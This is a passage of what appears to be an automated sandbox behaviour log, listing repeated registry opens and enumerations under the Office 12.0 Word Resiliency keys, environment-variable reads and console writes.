|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | size = 51 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 18 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 51 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 55 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 79 |
|
1 | |
| File | Write | size = 1 |
|
1 | |
| File | Write | size = 20 |
|
1 | |
| File | Write | size = 1 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
